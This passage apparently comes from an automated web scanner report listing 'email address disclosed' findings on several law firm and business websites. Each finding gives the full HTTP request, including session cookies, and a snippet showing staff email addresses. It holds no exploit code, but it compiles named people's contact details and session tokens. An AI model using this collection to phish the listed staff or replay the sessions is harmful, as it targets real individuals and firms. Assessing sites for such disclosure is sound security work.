X-Powered-By: PHP/4.4.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10084

<!-- Bonds : Start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
<a title="lwoodall@peckshaffer.com" href="mailto:lwoodall@peckshaffer.com">lwoodall@peckshaffer.com</a>
...[SNIP]...
<a title="rhill@peckshaffer.com" href="mailto:rhill@peckshaffer.com">rhill@peckshaffer.com</a>
...[SNIP]...
<a title="swithers@peckshaffer.com" href="mailto:swithers@peckshaffer.com">swithers@peckshaffer.com</a>
...[SNIP]...
<a href="mailto:skayes@peckshaffer.com">skayes@peckshaffer.com</a></p><p><a title="tfreeman@peckshaffer.com" href="mailto:tfreeman@peckshaffer.com" />
...[SNIP]...
27.42. http://www.perkinscoie.com/fcwsite/include/flowplayer/flowplayer.playlist-3.0.1.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /fcwsite/include/flowplayer/flowplayer.playlist-3.0.1.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /fcwsite/include/flowplayer/flowplayer.playlist-3.0.1.min.js HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1089; PortletId=1901; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Content-Length: 2336
Content-Type: application/x-javascript
Last-Modified: Fri, 04 Jun 2010 04:45:52 GMT
Accept-Ranges: bytes
ETag: "006fcfa03cb1:afa4"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:09:03 GMT

/**
* flowplayer.playlist.js 3.0.1. Flowplayer JavaScript plugin.
*
* This file is part of Flowplayer, http://flowplayer.org
*
* Author: Tero Piirainen, <support@flowplayer.org>
* Copyrig
...[SNIP]...
27.43. http://www.pillsburylaw.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /index.cfm?pageid=12&itemid=1908 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:44:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<a href="mailto:deborah.thorenpeden@pillsburylaw.com">deborah.thorenpeden@pillsburylaw.com</a>
...[SNIP]...
27.44. http://www.pomerantzlaw.com/cases.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 9411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<br />&nbsp;&nbsp;&nbsp; CKx shareholders seeking more information about this acquisition are advised to contact Gustavo Bruckner, Esq. at gfbruckner@pomlaw.com or 212-661-1100 or toll free at 888-476-6529, ext. 302. Shareholders may also contact Rachelle R. Boyle at rrboyle@pomlaw.com or 212-661-1100 or 888-476-6529, ext. 237.</p>
...[SNIP]...
27.45. http://www.pomerantzlaw.com/contact-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /contact-us.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-us.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305219554.1305223291.3; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=182215078; __utmb=182215078.2.10.1305223291

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:07:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<input style="width: 156px; height: 22px;" name="admin_email_addr" size="20" type="hidden" value="info@pomlaw.com ,josh@emailmessaging.net" />
...[SNIP]...
27.46. http://www.porterwright.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /careers/

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/ HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/government--regulatory-affairs-practice-areas/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=0; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393; __utmb=221978393.3.10.1305218573

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:50:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1146; path=/
Set-Cookie: PortletId=36001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 41358
Content-Length: 41358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>


       <t
...[SNIP]...
<A href="mailto:dzimmerman@porterwright.com">dzimmerman@porterwright.com <BR>
...[SNIP]...
27.47. http://www.powelltrachtman.com/Includes/clientcode/browserdetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.powelltrachtman.com
Path:   /Includes/clientcode/browserdetect.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Includes/clientcode/browserdetect.js HTTP/1.1
Host: www.powelltrachtman.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/
Cookie: ASPSESSIONIDASCDRDSB=MPBKIAACBIHGDJIDLNEFJILO; BIGipServerFIRMSND13-80=423943434.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 4582
Content-Type: application/x-javascript
Last-Modified: Tue, 12 Dec 2006 18:25:54 GMT
Accept-Ranges: bytes
ETag: "0e57df51a1ec71:7308"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:08:50 GMT

// Browser Detect Lite v2.1.4
// http://www.dithered.com/javascript/browser_detect/index.html
// modified by Chris Nott (chris@NOSPAMdithered.com - remove NOSPAM)


function BrowserDetectLite() {
var ua = navigator.userAgent.toLowerCase();

// browser name
this.isGecko = (ua.indexOf('gecko') != -1 && ua.indexOf('safari') ==
...[SNIP]...
27.48. http://www.poynerspruill.com/newsandevents/Pages/Creditors%27Committees.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.poynerspruill.com
Path:   /newsandevents/Pages/Creditors%27Committees.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /newsandevents/Pages/Creditors%27Committees.aspx HTTP/1.1
Host: www.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.poynerspruill.com/Pages/Home.aspx
Cookie: ISAWPLB{A742B51F-83D8-4EFD-BE14-22C82666BE24}={A1AFA5E0-233F-4E97-873C-6851032B7C8D}; __utma=27281085.1533661144.1305216539.1305216539.1305216539.1; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Wed, 27 Apr 2011 16:42:08 GMT
Date: Thu, 12 May 2011 16:42:09 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Last-Modified: Thu, 12 May 2011 16:42:08 GMT
Vary: Accept-Encoding
Content-Length: 26149


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><
...[SNIP]...
<a href="mailto:help@poyners.com">help@poyners.com</a>
...[SNIP]...
27.49. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.poynerspruill.com
Path:   /newsandevents/Pages/SignUpForAlerts.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /newsandevents/Pages/SignUpForAlerts.aspx HTTP/1.1
Host: www.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.poynerspruill.com/Pages/Home.aspx
Cookie: ISAWPLB{A742B51F-83D8-4EFD-BE14-22C82666BE24}={A1AFA5E0-233F-4E97-873C-6851032B7C8D}; __utma=27281085.1533661144.1305216539.1305216539.1305216539.1; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Wed, 27 Apr 2011 16:42:07 GMT
Date: Thu, 12 May 2011 16:42:08 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Last-Modified: Thu, 12 May 2011 16:42:07 GMT
Vary: Accept-Encoding
Content-Length: 44003


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><
...[SNIP]...
<A title="" href="mailto:lhudson@poyners.com" target="">
...[SNIP]...
27.50. http://www.rtacpa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rtacpa.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.rtacpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CB0QFjAA&url=http%3A%2F%2Fwww.rtacpa.com%2F&rct=j&q=reedtinsley&ei=Gy_MTZmgEOO_0AGh8aD2Bg&usg=AFQjCNEw7aDzOBKqm1WipAAg6_m5llEGNw&cad=rja

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=4636a284%2D6636%2D4962%2Da561%2Dec52c395e37d; domain=www.rtacpa.com; path=/; expires=Sat, 11-May-2041 02:55:40 GMT
Set-Cookie: CFTOKEN=0; domain=www.rtacpa.com; path=/; expires=Sat, 11-May-2041 02:55:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 16030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input value="reedt@rtacpa.com, josh@emailmessaging.net" name="XXDESXXnotify_add" type="hidden">
...[SNIP]...
<input value="josh@emailmessaging.net" name="XXDESXXnotify_remove" type="hidden">
...[SNIP]...
27.51. http://www.semmes.com/contact/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /contact/default.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact/default.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/contactus.asp
Cookie: ASPSESSIONIDAADQBBCA=KMLMMCADEPMDDMGHJLEPGMPD; __utma=249483141.1646832237.1305216169.1305216169.1305216169.1; __utmb=249483141; __utmc=249483141; __utmz=249483141.1305216169.1.1.utmccn=(organic)|utmcsr=google|utmctr=Semmes%2C+Bowen+%26+Semmes|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:04:03 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 30210
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
<a href="mailto:rscheiner@semmes.com">rscheiner@semmes.com</a>
...[SNIP]...
<a href="mailto:jbartlett@semmes.com">jbartlett@semmes.com</a>
...[SNIP]...
<a href="mailto:bpenfield@semmes.com">bpenfield@semmes.com</a>
...[SNIP]...
<a href="mailto:jmiedusiewski@semmes.com">jmiedusiewski@semmes.com</a>
...[SNIP]...
<a href="mailto:kpaglia@semmes.com">kpaglia@semmes.com</a>
...[SNIP]...
27.52. http://www.semmes.com/contactus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /contactus.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contactus.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/attorney_search.asp
Cookie: ASPSESSIONIDAADQBBCA=KMLMMCADEPMDDMGHJLEPGMPD; __utma=249483141.1646832237.1305216169.1305216169.1305216169.1; __utmb=249483141; __utmc=249483141; __utmz=249483141.1305216169.1.1.utmccn=(organic)|utmcsr=google|utmctr=Semmes%2C+Bowen+%26+Semmes|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:03:22 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 28585
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
<a href="mailto:rscheiner@semmes.com">rscheiner@semmes.com</a>
...[SNIP]...
<a href="mailto:jbartlett@semmes.com">jbartlett@semmes.com</a>
...[SNIP]...
<a href="mailto:bpenfield@semmes.com">bpenfield@semmes.com</a>
...[SNIP]...
<a href="mailto:jmiedusiewski@semmes.com">jmiedusiewski@semmes.com</a>
...[SNIP]...
<a href="mailto:kpaglia@semmes.com">kpaglia@semmes.com</a>
...[SNIP]...
27.53. http://www.sheehan.com/news/articles/Dastin-Honored-with-David-P.-Goodwin-NeighborWorks--Outstanding-Neighbor-Award_497.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheehan.com
Path:   /news/articles/Dastin-Honored-with-David-P.-Goodwin-NeighborWorks--Outstanding-Neighbor-Award_497.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /news/articles/Dastin-Honored-with-David-P.-Goodwin-NeighborWorks--Outstanding-Neighbor-Award_497.aspx HTTP/1.1
Host: www.sheehan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sheehan.com/
Cookie: ASP.NET_SessionId=r41aj2nnxwtkxd45jx11vt45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:03:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11569


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Sheehan Phinney Bass + Green PA :
   Dastin Honored with David P. Goodwi
...[SNIP]...
<a href='mailto:rdastin@sheehan.com'>rdastin@sheehan.com</a>
...[SNIP]...
27.54. http://www.sheehan.com/people/attorneys/Katherine-M.-Hanna.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheehan.com
Path:   /people/attorneys/Katherine-M.-Hanna.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /people/attorneys/Katherine-M.-Hanna.aspx HTTP/1.1
Host: www.sheehan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sheehan.com/people/attorneys/by-name.aspx
Cookie: ASP.NET_SessionId=r41aj2nnxwtkxd45jx11vt45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:50:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18277


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
   Katherine M. Hanna
</title>

<meta http-equiv="Content-Type" cont
...[SNIP]...
<a href='mailto:khanna@sheehan.com' >khanna@sheehan.com</a>
...[SNIP]...
27.55. http://www.sleepertechnologies.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sleepertechnologies.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sleepertechnologies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:58:41 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Connection: close
Content-Length: 19477
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAARCADB=MCGCODADMLMECKBPHGJPGMPB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<title>Baltimore Web Design by Sleeper Technologies</titl
...[SNIP]...
<font color="#F3F3F3" face="verdana,arial,san-serif" size="-1">
&nbsp;Baltimore Maryland&nbsp; / United States of America /
443.519.2254 / sales@sleepertechnologies.com</font>
...[SNIP]...
27.56. http://www.smithmazure.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smithmazure.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.smithmazure.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Smith+Mazure&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:02:32 GMT
Content-Length: 10541
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQTQSAQT=DMFHDBNBPFCIMBLNCJKDIPBL; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<area shape="rect" coords="7,106,182,122" href="mailto:contactus@smithmazure.com" />
...[SNIP]...
27.57. http://www.smithmazure.com/attorney.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smithmazure.com
Path:   /attorney.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /attorney.asp HTTP/1.1
Host: www.smithmazure.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
